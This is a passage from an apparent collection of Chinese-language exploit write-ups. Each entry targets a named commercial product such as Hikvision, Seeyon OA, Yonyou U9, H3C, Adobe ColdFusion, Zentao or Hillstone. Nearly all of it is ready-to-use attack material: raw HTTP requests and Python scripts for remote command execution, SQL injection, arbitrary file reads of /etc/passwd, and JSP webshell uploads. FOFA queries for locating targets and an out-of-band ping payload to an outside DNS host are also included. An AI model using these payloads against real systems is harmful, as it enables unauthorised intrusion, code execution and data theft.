28 | Content-Disposition: form-data; name="app"; filename="1.php"
29 | Content-Type: image/jpeg
30 |
31 |
32 | ------WebKitFormBoundary03rNBzFMIytvpWhy--
33 | ```
34 |
35 |
--------------------------------------------------------------------------------
/海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | **fofa语法:**
2 |
3 | app="HIKVISION-综合安防管理平台"
4 |
5 | ```
6 | payload:
7 | POST
8 | /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
9 | Host:
10 | Content-Type:
11 | application/x-www-form-urlencoded
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0;
13 | Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116
14 | Safari/537.36
15 | {"type":"environment","operate":"","machines":{"id":"$(ping+qsdiehtuxn.dgrh3.cn)"}Copy
16 | to clipboardErrorCopied
17 | ```
18 |
19 | ```
20 | 文件路径 /vms/static/1.txt payload:
21 | POST
22 | /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
23 | Host:
24 | Cache-Control: max-age=0
25 | Accept: application/json, text/javascript,
26 | */*; q=0.01
27 | X-Requested-With: XMLHttpRequest
28 | If-Modified-Since: Thu, 01 Jun 1970
29 | 00:00:00 GMT
30 | User-Agent: Mozilla/5.0 (Windows NT 10.0;
31 | Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0
32 | Safari/537.36
33 | Content-Type:
34 | application/x-www-form-urlencoded
35 | Accept-Encoding: gzip, deflate
36 | Accept-Language: zh-CN,zh;q=0.9
37 | Cookie:
38 | JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu=
39 | Connection: close
40 | Content-Length: 135
41 | {"type":"environment","operate":"","machines":{"id":"$(id
42 | >
43 | /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}
44 | ````
45 |
46 |
--------------------------------------------------------------------------------
/Docassemble任意文件读取漏洞(CVE-2024-27292).md:
--------------------------------------------------------------------------------
1 | ## fofa
2 |
3 | ```
4 | icon_hash="-575790689"
5 | ```
6 |
7 | ## poc
8 |
9 | ```
10 | id: CVE-2024-27292
11 |
12 | info:
13 | name:Docassemble-LocalFileInclusion
14 | author:johnk3r
15 | severity:high
16 | description:|
17 | Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
18 | reference:
19 | -https://tantosec.com/blog/docassemble/
20 | -https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
21 | -https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
22 | classification:
23 | cvss-metrics:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
24 | cvss-score:7.5
25 | cve-id:CVE-2024-27292
26 | cwe-id:CWE-706
27 | epss-score:0.00043
28 | epss-percentile:0.0866
29 | metadata:
30 | verified:true
31 | max-request:1
32 | shodan-query:http.title:"docassemble"
33 | fofa-query:icon_hash="-575790689"
34 | tags:cve,cve2024,docassemble,lfi
35 |
36 | http:
37 | -method:GET
38 | path:
39 | -"{{BaseURL}}/interview?i=/etc/passwd"
40 |
41 | matchers-condition:and
42 | matchers:
43 | -type:regex
44 | regex:
45 | -"root:.*:0:0:"
46 |
47 | -type:status
48 | status:
49 | - 501
50 | ```
51 |
52 |
--------------------------------------------------------------------------------
/捷诚管理信息系统 SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import time
3 | import requests
4 |
5 | def verify(ip):
6 | url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx'
7 | headers = {
8 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
9 | 'Connection': 'close',
10 | 'Content-Length': '369',
11 | 'Accept': '*/*',
12 | 'Accept-Language': 'en',
13 | 'Content-Type': 'text/xml; charset=utf-8',
14 | 'Accept-Encoding': 'gzip',
15 | }
16 | payload = '''
17 |
18 |
19 |
20 | 1';waitfor delay '0:0:5'--+
21 |
22 |
23 | '''
24 | try:
25 | start_time = time.time()
26 | response = requests.post(url, headers=headers, data=payload,verify=False)
27 | end_time = time.time()
28 | res_time = end_time - start_time
29 | # 验证成功输出相关信息
30 | if response.status_code == 200 and res_time > 5 and res_time < 8:
31 | print(f"{ip}存在捷诚管理信息系统SQL注入漏洞!!!")
32 |
33 | except Exception as e:
34 | pass
35 |
36 | if __name__ == '__main__':
37 | self = input('请输入目标主机IP地址:')
38 | verify(self)
39 | ```
40 |
41 |
--------------------------------------------------------------------------------
/山石网科云鉴存在前台任意命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import requests
3 | '''
4 | HSVD-2023-0008
5 | '''
6 | def setSystemTimeAction(newcsrf,headers):
7 | url = "https://192.168.199.221/master/ajaxActions/setSystemTimeAction.php?token_csrf="+newcsrf
8 | proxies = {'https':'http://127.0.0.1:8080'}
9 | x = "param=os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')"
10 | #req2 = requests.post(url2, data=x, proxies=proxies, verify=False, headers=headers)
11 | req2 = requests.post(url, data=x,headers=headers, verify=False)
12 |
13 | '''
14 | HSVD-2023-0005
15 | '''
16 | def getMessageSettingAction(newcsrf,header):
17 | proxies = {'https':'http://127.0.0.1:8080'}
18 | company_uuid = "aaa"
19 | platform_sel = "os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')"
20 | url = 'https://192.168.199.221/master/ajaxActions/getMessageSettingAction.php?token_csrf='+newcsrf+"&company_uuid="+company_uuid+"&platform_sel="+platform_sel
21 | req = requests.get(url, headers=header, verify=False)
22 | print(req.text)
23 |
24 |
25 | def main():
26 | headers = {"Cookie": "PHPSESSID=emhpeXVhbg;",
27 | "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"
28 | }
29 | url = "https://192.168.199.221/master/ajaxActions/getTokenAction.php"
30 | req = requests.post(url, verify=False, headers=headers)
31 | newcsrf = req.text.replace("\n", "")
32 | setSystemTimeAction(newcsrf,headers)
33 | reshell = requests.get('https://192.168.199.221/master/img/config',verify=False)
34 | print('---------------------cmd-------------------------')
35 | print(reshell.text)
36 |
37 | if __name__ == '__main__':
38 | main()
39 | ```
40 |
41 |
--------------------------------------------------------------------------------
/科荣 AIO 管理系统任意文件读取.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import base64
3 | import requests
4 |
5 | def poc(ip, file_path):
6 |
7 | # 构造URL地址
8 | url = f'http://{ip}/UtilServlet'
9 | headers = {
10 | 'Upgrade - Insecure - Requests': '1',
11 | 'sec - ch - ua - mobile': '?0',
12 | 'Cache - Control': 'no - cache',
13 | 'Pragma': 'no - cache',
14 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
15 | 'Accept - Encoding': 'gzip, deflate',
16 | 'Content - Type': 'application / x - www - form - urlencoded',
17 | 'sec - ch - ua': '"Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"',
18 | 'sec - ch - ua - platform': '"Windows"',
19 | 'Accept - Language': 'zh-CN,zh;q=0.9',
20 | 'User - Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
21 | 'Content - Length': '0'
22 | }
23 | data = {
24 | f'operation=readErrorExcel&fileName={file_path}'
25 | }
26 | print(url,data)
27 | try:
28 | response = requests.get(url=url, headers=headers, data=data)
29 | byte_data = response.encode(encoding='utf-8')
30 | response = base64.b64encode(byte_data)
31 | print(response)
32 | if response.status_code == 200 :
33 | print(f' {ip} 存在科荣 AIO 管理系统任意文件读取漏洞!!!')
34 | print(response.text)
35 | except Exception as e:
36 | print(f'{ip} 请求失败:{e}')
37 | pass
38 |
39 | if __name__ == '__main__':
40 | ip = input('请输入目标主机IP地址:')
41 | file_path = input('请输入需要访问的文件路径:')
42 | poc(ip, file_path)
43 | ```
44 |
45 |
--------------------------------------------------------------------------------
/用友U9系统DoQuery接口存在SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
3 | Host:
4 | Content-Type: text/xml; charset=utf-8
5 | Content-Length: 309
6 | SOAPAction: "http://tempuri.org/GetEnterprise"
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 | POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
18 | Host:
19 | Content-Type: text/xml; charset=utf-8
20 | Content-Length: 345
21 | SOAPAction: "http://tempuri.org/GetToken"
22 |
23 |
24 |
25 |
26 |
27 | 000
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 | POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
36 | Host:
37 | Content-Type: text/xml; charset=utf-8
38 | Content-Length: 345
39 | SOAPAction: "http://tempuri.org/DoQuery"
40 |
41 |
42 |
43 |
44 |
45 |
46 | select 1;waitfor delay '0:0:1' --
47 |
48 |
49 |
50 | ```
51 |
52 |
--------------------------------------------------------------------------------
/H3C Magic B1STV100R012 RCE.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
3 | Host: xxx.xxx.xxx.xxx
4 | Content-Length: 1569
5 | Content-Type: application/x-www-form-urlencoded
6 |
7 | pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/致远 OA fileUpload.do 前台文件上传绕过漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
4 | Host:
5 | Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
6 | Content-Type: multipart/form-data; boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)
7 | Content-Length: 754
8 |
9 | --00content0boundary00
10 | Content-Disposition: form-data; name="type"
11 |
12 | --00content0boundary00
13 | Content-Disposition: form-data; name="extensions"
14 |
15 | png
16 | --00content0boundary00
17 | Content-Disposition: form-data; name="applicationCategory"
18 |
19 | --00content0boundary00
20 | Content-Disposition: form-data; name="destDirectory"
21 |
22 | --00content0boundary00
23 | Content-Disposition: form-data; name="destFilename"
24 |
25 | --00content0boundary00
26 | Content-Disposition: form-data; name="maxSize"
27 |
28 | --00content0boundary00
29 | Content-Disposition: form-data; name="isEncrypt"
30 |
31 | false
32 | --00content0boundary00
33 | Content-Disposition: form-data; name="file1"; filename="1.png" Content-Type: Content-Type: application/pdf
34 | <% out.println("hello");%>
35 | --00content0boundary00--
36 | ```
37 |
38 |
39 |
40 |
41 |
42 | 修改文件后缀为 jsp
43 |
44 | ```
45 | POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
46 | Host:
47 | Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
48 | Content-type: application/x-www-form-urlencoded
49 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
50 | Content-Length: 64
51 |
52 | method=uploadMenuIcon&fileid=ID 值&filename=qwe.jsp
53 | ```
54 |
55 |
--------------------------------------------------------------------------------
/Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md:
--------------------------------------------------------------------------------
1 | ```
2 | import requests
3 | import re
4 | import urllib3
5 | import argparse
6 |
7 | urllib3.disable_warnings()
8 |
9 | parser = argparse.ArgumentParser()
10 | parser.add_argument("-t", "--target",required=True, help="Target Adobe ColdFusion Server URL")
11 | parser.add_argument("-p", "--port",required=False, default=8500, help="Target Adobe ColdFusion Server Port, by default we use the 8500 Port")
12 | parser.add_argument("-c", "--command", required=True,help="File to read path") # Example in Windows Server 'Windows/ServerStandardEval.xml' or Linux Server "etc/passwd"
13 | args = parser.parse_args()
14 |
15 | def get_uuid():
16 | endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat" # Vulnerable endpoint to get the UUID
17 | session = requests.Session()
18 | try:
19 | response = session.get(args.target+":"+str(args.port)+endpoint, verify=False)
20 | print("[+] Connecting to ColdFusion Server...")
21 | repattern = r"(.+?)" # Regex expression to get UUID
22 | uuid = re.findall(repattern, response.text)[0]
23 | print("[+] UUID Obtained: ", uuid)
24 | return uuid
25 | except:
26 | print("[-] Error connecting to server")
27 |
28 | def exploit(uuid):
29 | headers = {
30 | "uuid": uuid
31 | }
32 | session = requests.Session()
33 | endpoint2 = "/pms?module=logging&file_name=../../../../../../../"+args.command+"&number_of_lines=100" # Vulnerable endpoint to read files
34 | response = session.get(args.target+":"+str(args.port)+endpoint2, verify=False, headers=headers)
35 | if response.status_code == 200 and int(response.headers["Content-Length"]) > 2:
36 | print("[+] Succesfully read file!")
37 | print(response.text)
38 | else:
39 | print("[-] Something went wrong while reading file or the file doesn't exist")
40 |
41 | if __name__ == "__main__":
42 | exploit(get_uuid())
43 | ```
44 |
45 |
--------------------------------------------------------------------------------
/铭飞MCMS 远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /static/plugins/ueditor/1.4.3.3/jsp/editor.do?jsonConfig=%7b%76%69%64%65%6f%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%66%69%6c%65%4d%61%6e%61%67%65%72%4c%69%73%74%50%61%74%68%3a%27%27%2c%69%6d%61%67%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%76%69%64%65%6f%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%7b%5c%75%30%30%32%45%5c%75%30%30%32%45%5c%75%30%30%32%46%7d%7b%74%65%6d%70%6c%61%74%65%2f%31%2f%64%65%66%61%75%6c%74%2f%7d%7b%74%69%6d%65%7d%27%2c%66%69%6c%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%76%69%64%65%6f%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%22%69%6d%61%67%65%41%6c%6c%6f%77%46%69%6c%65%73%22%3a%5b%22%2e%70%6e%67%22%2c%20%22%2e%6a%70%67%22%2c%20%22%2e%6a%70%65%67%22%2c%20%22%2e%6a%73%70%78%22%2c%20%22%2e%6a%73%70%22%2c%22%2e%68%74%6d%22%5d%7d%0a&action=uploadimage HTTP/1.1
3 | User-Agent: xxx
4 | Accept: \*/\*
5 | Postman-Token: bb71767c-7223-4ba3-8151-c81b8a5dc1ec
6 | Host: 127.0.0.1:8080
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | Content-Type: multipart/form-data; boundary=--------------------------583450229485407027180070
10 | Content-Length: 279
11 |
12 | ----------------------------583450229485407027180070
13 | Content-Disposition: form-data; name="upload"; filename="1.htm"
14 | Content-Type: image/png
15 |
16 | <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whoami") }
17 | ----------------------------583450229485407027180070--
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
3 | Host: 127.0.0.1
4 | User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
5 | Content-Length: 1573
6 | Content-Type: application/x-www-form-urlencoded
7 | Accept-Encoding: gzip
8 |
9 | pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/红海云eHR kqFile.mob 任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
4 | Host: x.x.x.x
5 | Accept-Encoding: gzip
6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
8 | Content-Length: 210
9 |
10 | ------WebKitFormBoundaryt7WbDl1tXogoZys4
11 | Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
12 | Content-Type:image/jpeg
13 |
14 | <% out.print("hello,eHR");%>
15 | ------WebKitFormBoundaryt7WbDl1tXogoZys4--
16 |
17 | /uploadfile/2024/05/12/20240512_xxxxxx.jsp
18 | ```
19 |
20 |
21 |
22 | poc2
23 |
24 | ```
25 |
26 | POST /RedseaPlatform/kqFile.mob?method=uploadFile&fileName=123.jspx HTTP/1.1
27 | Host:
28 | Pragma: no-cache
29 | Cache-Control: no-cache
30 | Upgrade-Insecure-Requests: 1
31 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
32 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
33 | Accept-Encoding: gzip, deflat
34 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
35 | Cookie: JSESSIONID=391295A33F5DA2F1DB07485CEC9602E8
36 | Connection: close
37 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS7jL1beJUXUUnhE8
38 | Content-Length: 395
39 |
40 | ------WebKitFormBoundaryS7jL1beJUXUUnhE8
41 | Content-Disposition: form-data; name="fj_file";filename=|$|"222.jpg"|$|
42 |
43 |
44 |
45 |
46 | jsp:scriptlet
49 |
50 | ------WebKitFormBoundaryS7jL1beJUXUUnhE8--
51 | ```
52 |
53 |
--------------------------------------------------------------------------------
/禅道研发项⽬管理系统未授权.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import requests
3 |
4 | def check(url):
5 | url1 = url+'/misc-captcha-user.html'
6 | # url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'#非伪静态版本按照此格式传参
7 | # url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'#可判断验证绕过的链接
8 | url3 = url + 'repo-create.html'
9 | url4 = url + 'repo-edit-10000-10000.html'
10 | headers={
11 | "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
12 | "Accept-Language":"zh-CN,zh;q=0.9",
13 | "Cookie":"zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
14 | }
15 |
16 | headers2 = {
17 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
18 | "Accept-Language": "zh-CN,zh;q=0.9",
19 | "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
20 | "Content-Type":"application/x-www-form-urlencoded",
21 | "X-Requested-With":"XMLHttpRequest",
22 | "Referer":url+"/repo-edit-1-0.html"
23 | }
24 |
25 | data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
26 | data2 = 'SCM=Subversion&client=`id`'
27 | s=requests.session()
28 | try:
29 | req1 = s.get(url1,proxies=proxies,timeout=5,verify=False,headers=headers)
30 | req3 = s.post(url3,data=data1,proxies=proxies,timeout=5,verify=False,headers=headers2)
31 | req4 = s.post(url4,data=data2,proxies=proxies,timeout=5,verify=False,headers=headers2)
32 | if 'uid=' in req4.text:
33 | print(url,"")
34 | return True
35 | except Exception as e:
36 | print(e)
37 | return False
38 | if __name__ == '__main__':
39 | print(check("http://x.x.x.x/zentao/"))
40 | ```
41 |
42 |
--------------------------------------------------------------------------------
/邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /FlowChartDefine/ExcelIn.aspx HTTP/1.1
3 | Host:
4 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAU4uQKbpWhA7eME3
5 | Cookie: ASP.NET_SessionId=oewffeov54f2dfj3iyz2u1qp
6 | Accept-Language: zh-CN,zh;q=0.9
7 | Upgrade-Insecure-Requests: 1
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10 | Cache-Control: max-age=0
11 | Accept-Encoding: gzip, deflate
12 | Content-Length: 1470
13 |
14 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3
15 | Content-Disposition: form-data; name="__VIEWSTATE"
16 |
17 | U6iRl9SqWWlhjIPJXIeFrsinqYAmYxenxFiyfWFMfWgnw3OtkceDLcdfRvB8pmUNGk44PvjZ6LlzPwDbJGmilsmhuX9LvOiuKadYa9iDdSipLW5JvUHjS89aGzKqr9fhih+p+/Mm+q2vrknhfEJJnQ==
18 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3
19 | Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
20 |
21 | FD259C0F
22 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3
23 | Content-Disposition: form-data; name="__EVENTVALIDATION"
24 |
25 | /pKblUYGQ+ibKtw4CCS2wzX+lmZIOB+x5ezYw0qJFbaUifUKlxNNRMKceZYgY/eAUUTaxe0gSvyv/oA8lUS7G7jPVqqrMEzYBVBl8dRkFWFwMqqjv1G9gXM/ZnIpnVSL
26 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3
27 | Content-Disposition: form-data; name="FileUpload1"; filename="1234.zip"
28 | Content-Type: application/x-zip-compressed
29 |
